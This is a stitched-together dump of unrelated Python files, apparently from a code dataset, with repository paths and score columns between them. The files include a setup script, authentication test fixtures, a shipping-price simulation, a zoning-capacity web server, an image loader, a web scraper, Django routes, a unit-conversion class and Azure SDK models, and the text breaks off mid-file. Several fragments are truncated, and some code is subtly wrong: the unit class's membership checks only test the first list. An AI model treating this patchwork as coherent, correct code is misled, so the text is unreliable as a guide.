# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages
setup(
name='typobs',
version='0.0.3',
entry_points={
'console_scripts': [
'to_obsidian=to_obsidian:run',
'to_typora=to_typora:run',
]
},
packages=find_packages(),
# metadata to display on PyPI
author="<NAME>",
author_email="<EMAIL>",
description="Convert between Typora and Obsidian link styles",
keywords="Typora Obsidian Markdown link converter",
url="https://github.com/jerzydziewierz/typobs", # project home page, if any
project_urls={
"Bug Tracker": "https://github.com/jerzydziewierz/typobs",
"Documentation": "https://github.com/jerzydziewierz/typobs",
"Source Code": "https://github.com/jerzydziewierz/typobs",
},
classifiers=[
"Programming Language :: Python",
"Topic :: Documentation",
"Topic :: Software Development :: Documentation",
"Topic :: Office/Business",
"Topic :: Text Processing :: Filters",
"Topic :: Text Processing :: Markup",
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"License :: OSI Approved :: Apache Software License",
]
) | 1.953125 | 2 |
tests/fixtures.py | ehelms/system-baseline-backend | 0 | 4981 | """
decoded AUTH_HEADER (newlines added for readability):
{
"identity": {
"account_number": "1234",
"internal": {
"org_id": "5678"
},
"type": "User",
"user": {
"email": "<EMAIL>",
"first_name": "Firstname",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Lastname",
"locale": "en_US",
"username": "test_username"
}
}
"entitlements": {
"smart_management": {
"is_entitled": true
}
}
}
"""
AUTH_HEADER = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>
}
AUTH_HEADER_NO_ENTITLEMENTS = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>
}
AUTH_HEADER_SMART_MGMT_FALSE = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"c19vcmdfYWRtaW<KEY>lLCJsYXN0X25hbWUi"
"<KEY>"
"<KEY>l"
"bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu"
"dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg=="
}
# this can't happen in real life, adding test anyway
AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = {
"X-RH-IDENTITY": "<KEY>f"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9"
"fX0K"
}
"""
decoded AUTH_HEADER_NO_ACCT (newlines added for readablity):
{
"identity": {
"internal": {
"org_id": "9999"
},
"type": "User",
"user": {
"email": "<EMAIL>",
"first_name": "No",
"is_active": true,
"is_internal": true,
"is_org_admin": false,
"last_name": "Number",
"locale": "en_US",
"username": "nonumber"
}
}
}
"""
AUTH_HEADER_NO_ACCT = {
"X-RH-IDENTITY": "<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>"
"<KEY>
}
BASELINE_ONE_LOAD = {
"baseline_facts": [
{"name": "arch", "value": "x86_64"},
{"name": "phony.arch.fact", "value": "some value"},
],
"display_name": "arch baseline",
}
BASELINE_TWO_LOAD = {
"baseline_facts": [
{"name": "memory", "value": "64GB"},
{"name": "cpu_sockets", "value": "16"},
],
"display_name": "cpu + mem baseline",
}
BASELINE_THREE_LOAD = {
"baseline_facts": [
{"name": "nested", "values": [{"name": "cpu_sockets", "value": "16"}]}
],
"display_name": "cpu + mem baseline",
}
BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]}
BASELINE_PARTIAL_TWO = {
"display_name": "ABCDE",
"baseline_facts": [
{
"name": "hello",
"values": [
{"name": "nested_one", "value": "one"},
{"name": "nested_two", "value": "two"},
],
}
],
}
BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"}
CREATE_FROM_INVENTORY = {
"display_name": "created_from_inventory",
"inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa",
}
SYSTEM_WITH_PROFILE = {
"account": "9876543",
"bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb",
"created": "2018-01-31T13:00:00.100010Z",
"display_name": None,
"fqdn": None,
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
"insights_id": "00000000-28af-11e9-9ab0-c85b761454fa",
"ip_addresses": ["10.0.0.3", "fc00:db20:35b:7399::5"],
"mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"],
"rhel_machine_id": None,
"satellite_id": None,
"subscription_manager_id": "RHN Classic and Red Hat Subscription Management",
"system_profile": {
"salutation": "hi",
"system_profile_exists": False,
"installed_packages": [
"openssl-1.1.1c-2.fc30.x86_64",
"python2-libs-2.7.16-2.fc30.x86_64",
],
"id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa",
},
"tags": [],
"updated": "2018-01-31T14:00:00.500000Z",
}
| 1.921875 | 2 |
2021-02-03/2.py | Elfenreigen/MCM-2021-C-SJTU-Test | 1 | 4982 | <reponame>Elfenreigen/MCM-2021-C-SJTU-Test
#####Time Flow Simulation######
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import timedelta
import datetime
import csv
data=pd.read_excel('CF66-all.xlsx')
data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True)
or_data=pd.read_excel('CF66-ordinary.xlsx')
rule=pd.read_excel('6. Existing pricing strategy.xlsx')
or_name=or_data['WBL_NUM'].unique()
data['ordinary']=0
for i in range(len(data)):
if data.iloc[i,2] in or_name:
data.iloc[i,9]=1
data['volume']=data['CNTR_TYPE']
for i in range(len(data)):
data.iloc[i,10]=int(data.iloc[i,10][0:2])
raw_data=data.groupby('SVVD')
data_to_list=list(raw_data)
raw_list=[]
for i in data_to_list:
raw_list.append(i[1])
total_volume=raw_data['volume'].sum()*1.2
thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口'))
group_rule=thisrule.groupby(['开始天数','结束天数'])
rule_to_list=list(group_rule)
day_list=[]
rule_list=[]
for i in rule_to_list:
day_list.append(i[0])
rule_list.append(i[1])
m=datetime.timedelta(days=14)
newlist=[]
for i in raw_list:
i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT'])
m=datetime.timedelta(days=14)
j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m]
newlist.append(j)
del(raw_list)
for i in newlist:
i['acc_volume']=i['volume'].cumsum()
i['total_volume']=i['volume'].sum()*1.2
m=datetime.timedelta(days=14)
i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days
i['acc_rate']=i['acc_volume']/i['total_volume']*100
i['new_AMT']=i['AMT']
for k in range(len(newlist)):
acc_20gp=0
acc_40gp=0
acc_40hq=0
print('k='+str(k))
for i in range(len(day_list)):
print('i='+str(i))
first_day=day_list[i][0]
last_day=day_list[i][1]
flag=[0]*len(rule_list[i])
for j in range(len(newlist[k])):
if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1:
for z in range(len(rule_list[i])):
print('z='+str(z))
if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价':
if flag[z]==0:
flag[z]=1
acc_20gp+=rule_list[i].iloc[z]['20GP']
acc_40gp+=rule_list[i].iloc[z]['40GP']
acc_40hq+=rule_list[i].iloc[z]['40HQ']
if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价':
if flag[z]==0:
flag[z]=1
acc_20gp-=rule_list[i].iloc[z]['20GP']
acc_40gp-=rule_list[i].iloc[z]['40GP']
acc_40hq-=rule_list[i].iloc[z]['40HQ']
print(flag)
print(acc_20gp)
print(acc_40gp)
print(acc_40hq)
if newlist[k].iloc[j]['CNTR_TYPE']=='20GP':
newlist[k].iloc[j,15]+=acc_20gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40GP':
newlist[k].iloc[j,15]+=acc_40gp
if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ':
newlist[k].iloc[j,15]+=acc_40hq
for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
| 2.296875 | 2 |
tests/test_selection.py | qrebjock/fanok | 0 | 4983 | import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
@pytest.mark.parametrize(
"w, q, offset, expected",
[
([1, 2, 3, 4, 5], 0.1, 0, 1),
([-1, 2, -3, 4, 5], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
(
[-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
0.1,
0,
1.93,
),
],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
w = np.array(w)
threshold = adaptive_significance_threshold(w, q, offset=offset)
assert threshold == expected
| 2.5625 | 3 |
unitcap/unit_cap.py | fintelia/habitationi | 1 | 4984 | <reponame>fintelia/habitationi
#!/usr/bin/python
# Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
def get_caps(options):
far = {}
for i in ['A-1', 'A-2', 'B', 'SD-2']:
far[i] = 0.5
for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']:
far[i] = 0.6
for i in ['C-1', 'BA-3', 'IB-2', 'O-1']:
far[i] = .75
for i in ['BA-1', 'SD-12']:
far[i] = 1.0
for i in ['C-1A', 'SD-5']:
far[i] = 1.25
for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']:
far[i] = 1.5
for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']:
far[i] = 1.75
for i in ['BC', 'O-2']:
far[i] = 2.0
for i in ['C-2A']:
far[i] = 2.50
for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']:
far[i] = 3.0
for i in ['IA-2', 'IB']:
far[i] = 4.0
far['BB-1'] = 3.25
far['SD-11'] = 1.7
far['SD-15'] = 3.5
lot_area = {
'A-1': 6000,
'A-2': 4500,
'C-1A': 1000,
'BC': 500,
'BC-1': 450,
'IA-1': 700,
'SD-8': 650,
'SD-14': 800,
}
for i in ['IB-2', 'BA-1']:
lot_area[i] = 1200
for i in ['B', 'SD-2', 'SD-3']:
lot_area[i] = 2500
for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']:
lot_area[i] = 1800
for i in ['C-1', 'BA-3']:
lot_area[i] = 1500
for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']:
lot_area[i] = 600
for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']:
lot_area[i] = 300
for i in lot_area:
if options and 'lot_explicit' in options:
lot_area[i] = options['lot_explicit']
elif options and 'lot_factor' in options:
lot_area[i] = int(lot_area[i] / float(options['lot_factor']))
if 'no_lot' in options:
lot_area = {}
for i in far:
if options and 'far_explicit' in options:
far[i] = options['far_explicit']
elif options and 'far_factor' in options:
far[i] = far[i] * float(options['far_factor'])
if 'no_far' in options:
far = {}
return far, lot_area
def table(options):
far, lot_area = get_caps(options)
table = []
for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']:
table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,"")))
return "\n".join(table)
def unit_cap(row, options=None):
if not options:
options = {}
far, lot_area = get_caps(options)
zone = row['zone']
if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD":
return -1
if zone in ['A-1', 'A-2'] and not 'no_a' in options:
return 1
#print row
area = float(row.get('gis_lot_size',0) or 0)
if zone in lot_area and area:
m = max(area/(lot_area[zone]), 1)
else:
m = 100000
max_building = area * far[zone] * 1
if max(int(max_building/800), 1) < m:
m = max(int(max_building/800), 1)
if zone == "B" and not 'no_b' in options:
m = min(m, 2)
return m
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def compute_count(options = None):
conn = sqlite3.connect("prop.db")
if options == None:
options = {}
c = conn.cursor()
c.row_factory = dict_factory
m = 0
current = 0
for row in c.execute("SELECT * FROM lots"):
t = unit_cap(row, options=options)
if t == -1:
continue
m += int(t)
return m
def describe(options):
changes = []
if 'no_lot' in options:
changes.append("eliminate lot size/unit minimums")
elif 'lot_explicit' in options:
changes.append("set all lot size/unit minimums to %s" % options['lot_explicit'])
elif 'lot_factor' in options and options['lot_factor'] != 1.0:
changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor'])
if 'no_a' in options:
changes.append('eliminate single family zoning in A-1 and A-2 zones')
if 'no_b' in options:
changes.append('eliminate two-family zoning limits in B zones')
if 'far_explicit' in options:
changes.append("set all FAR maximums to %s" % options['far_explicit'])
elif 'far_factor' in options and options['far_factor'] != 1.0:
changes.append('increase FAR maximums by a factor of %s' % options['far_factor'])
if len(changes):
return ", ".join(changes)
else:
return ""
def serve(options):
d = open("unit_template.html")
template = Template( d.read() )
unit_count = int(compute_count(options))
data = {}
data['changes'] = describe(options)
data['unit_count'] = unit_count
data['increase'] = unit_count-37453
data['table'] = table(options)
data['options'] = options
s = template.render(**data)
return s
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html')
self.end_headers()
# Send the html message
form = parse_qs(urlparse(self.path).query)
options = {}
for i in ['far_factor', 'lot_factor']:
if i in form:
options[i] = float(form[i][0])
else:
options[i] = 1.0
if 'far_explicit' in form and form['far_explicit']:
options['far_explicit'] = float(form['far_explicit'][0])
if 'lot_explicit' in form and form['lot_explicit']:
options['lot_explicit'] = int(form['lot_explicit'][0])
if 'lot' in form:
options['no_lot'] = True
if 'singlefamily' in form:
options['no_a'] = True
if 'twofamily' in form:
options['no_b'] = True
self.wfile.write(serve(options))
return
def run():
try:
#Create a web server and define the handler to manage the
#incoming request
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
#Wait forever for incoming htto requests
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
if __name__ == "__main__":
print run()
| 2.21875 | 2 |
matrix/__init__.py | AbhiK002/Matrix | 2 | 4985 | <filename>matrix/__init__.py
from .main import Matrix
| 0.949219 | 1 |
samples/cmk/test.py | jasstionzyf/Mask_RCNN | 0 | 4986 | <filename>samples/cmk/test.py
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
import cv2
def locationToMask(locations=None,height=None,width=None):
mask = np.zeros([height, width, len(locations)],
dtype=np.uint8)
for index,location in enumerate(locations):
x1, y1, x2, y2 = location
mask[y1:y2+1,x1:x2+1,index]=1
print(mask[:,:,index])
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def load_cmk(dataset_dir, subset):
folder=os.path.join(dataset_dir, subset)
imagesPattern=folder+'/*.jpg'
for image_path in glob.glob(imagesPattern):
print(image_path)
img = cv2.imread(image_path)
height,width = img.shape[:2]
imageId=os.path.basename(image_path).replace('.jpg','')
print(imageId)
#
# self.add_image(
# "balloon",
# image_id=a['filename'], # use file name as a unique image id
# path=image_path,
# width=width, height=height,
# polygons=polygons)
locationsFile='%s/%s.txt' % (folder,imageId)
locations=[]
with open(locationsFile) as fp:
lines = fp.readlines()
for line in lines:
line = line.replace('\n', '')
if len(line.split(' ')) < 5:
break
classIndex, xcen, ycen, w, h = line.strip().split(' ')
xmin = max(float(xcen) - float(w) / 2, 0)
xmax = min(float(xcen) + float(w) / 2, 1)
ymin = max(float(ycen) - float(h) / 2, 0)
ymax = min(float(ycen) + float(h) / 2, 1)
xmin = int(width * xmin)
xmax = int(width * xmax)
ymin = int(height * ymin)
ymax = int(height * ymax)
location=(xmin,ymin,xmax,ymax)
locations.append(location)
print(locations)
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
| 2.21875 | 2 |
myBeautifulSoup.py | ZhongXinWang/python | 0 | 4987 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
#格式化
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("名称:%s,地址:%s" % (i.getText(),i.get('href'))) | 3.203125 | 3 |
blogsNewsModule/urls.py | adityakekare/NewsAPIDjango | 1 | 4988 | <gh_stars>1-10
from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
] | 2.046875 | 2 |
unitClass.py | MatthewZheng/UnitsPlease | 0 | 4989 | <reponame>MatthewZheng/UnitsPlease
#!/usr/bin/python
_author_ = "<NAME>"
_purpose_ = "Sets up the unit class"
class Unit:
'''This is a class of lists'''
def __init__(self):
self.baseUnits = ["m", "kg", "A", "s", "K", "mol", "cd", "sr", "rad"]
self.derivedUnits = ["Hz", "N", "Pa", "J", "W", "C", "V", "F", "ohm", "S", "Wb", "T", "H", "°C", "lm", "lx", "Bq", "Gy", "Sv", "kat"]
def baseCheck(self, userList):
'''Converts elements in str list to base units'''
converted = []
for i in (userList):
isSquared = False
unitPreIndex = ""
#checks if it has a carat in the expression
for ind, j in enumerate(list(i)):
if j == "^":
isSquared = True
unitPreIndex = ''.join(list(i)[:ind])
break
#converts non-unary unit to base unit and checks for squared variables
while(i not in (self.baseUnits or self.derivedUnits) and len(list(i)) != 1 and unitPreIndex not in (self.baseUnits or self.derivedUnits) and len(unitPreIndex) != 1):
orgNameList = list(i)
#identify prefix removed
self.idPrefix = orgNameList.pop(0)
i = ''.join(orgNameList)
print("The program removed the prefix %s and converted your unit to it's base unit: %s." % (self.idPrefix, i))
#checks if it is a special unit
if(i not in (self.baseUnits and self.derivedUnits)):
#append in case for special units
break
else:
#append in case for base unit
break
#Appends base unit
if(i in (self.baseUnits or self.derivedUnits) and isSquared == False):
converted.append(i)
elif(isSquared == True):
toAppend = []
numReps = []
#run once to get number of times the unit is squared
for index, val in enumerate(list(i)):
if val == "^":
numStart = index+1
numReps.append(''.join(list(i)[numStart:]))
toAppend.append(''.join(list(i)[:index]))
break
#convert numReps into an int
intReps = int(''.join(numReps))
#append number of units specified by the carat
for l in range (intReps):
if(''.join(toAppend) not in (self.baseUnits or self.derivedUnits)):
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % ''.join(toAppend))
converted.append(''.join(toAppend))
#Exception for special units
else:
print("Your variable %s was not in the commonly used units OR it is a derived unit such as N, newtons -- we will add it to the product regardless." % i)
converted.append(i)
return(converted)
| 3.671875 | 4 |
week4/string_format.py | MathAdventurer/Data_Mining | 1 | 4990 | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
@author: <NAME>
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems")) | 3.171875 | 3 |
conans/server/server_launcher.py | Wonders11/conan | 6,205 | 4991 | <gh_stars>1000+
from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
def main(*args):
launcher.launch()
if __name__ == "__main__":
main()
| 1.71875 | 2 |
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py | praveenkuttappan/azure-sdk-for-python | 2,728 | 4992 | <filename>sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class Resource(msrest.serialization.Model):
"""Common fields that are returned in the response for all Azure Resource Manager resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ProxyResource(Resource):
"""The resource model definition for a Azure Resource Manager proxy resource. It will not have tags and a location.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
}
def __init__(
self,
**kwargs
):
super(ProxyResource, self).__init__(**kwargs)
class AccessPolicyEntity(ProxyResource):
"""Access policies help define the authentication rules, and control access to specific video resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param role: Defines the access level granted by this policy. Possible values include:
"Reader".
:type role: str or ~video_analyzer.models.AccessPolicyRole
:param authentication: Authentication method to be used when validating client API access.
:type authentication: ~video_analyzer.models.AuthenticationBase
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'role': {'key': 'properties.role', 'type': 'str'},
'authentication': {'key': 'properties.authentication', 'type': 'AuthenticationBase'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntity, self).__init__(**kwargs)
self.role = kwargs.get('role', None)
self.authentication = kwargs.get('authentication', None)
class AccessPolicyEntityCollection(msrest.serialization.Model):
"""A collection of AccessPolicyEntity items.
:param value: A collection of AccessPolicyEntity items.
:type value: list[~video_analyzer.models.AccessPolicyEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[AccessPolicyEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccessPolicyEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class AccountEncryption(msrest.serialization.Model):
"""Defines how the Video Analyzer account is (optionally) encrypted.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type: Required. The type of key used to encrypt the Account Key. Possible values
include: "SystemKey", "CustomerKey".
:type type: str or ~video_analyzer.models.AccountEncryptionKeyType
:param key_vault_properties: The properties of the key used to encrypt the account.
:type key_vault_properties: ~video_analyzer.models.KeyVaultProperties
:param identity: The Key Vault identity.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the Key Vault mapping.
:vartype status: str
"""
_validation = {
'type': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AccountEncryption, self).__init__(**kwargs)
self.type = kwargs['type']
self.key_vault_properties = kwargs.get('key_vault_properties', None)
self.identity = kwargs.get('identity', None)
self.status = None
class AudioEncoderBase(msrest.serialization.Model):
"""Base type for all audio encoder presets, which define the recipe or instructions on how audio should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AudioEncoderAac.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.AudioEncoderAac': 'AudioEncoderAac'}
}
def __init__(
self,
**kwargs
):
super(AudioEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
class AudioEncoderAac(AudioEncoderBase):
"""A custom preset for encoding audio with the AAC codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: Bitrate, in kilobits per second or Kbps, at which audio should be encoded
(2-channel stereo audio at a sampling rate of 48 kHz). Allowed values are 96, 112, 128, 160,
192, 224, and 256. If omitted, the bitrate of the input audio is used.
:type bitrate_kbps: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AudioEncoderAac, self).__init__(**kwargs)
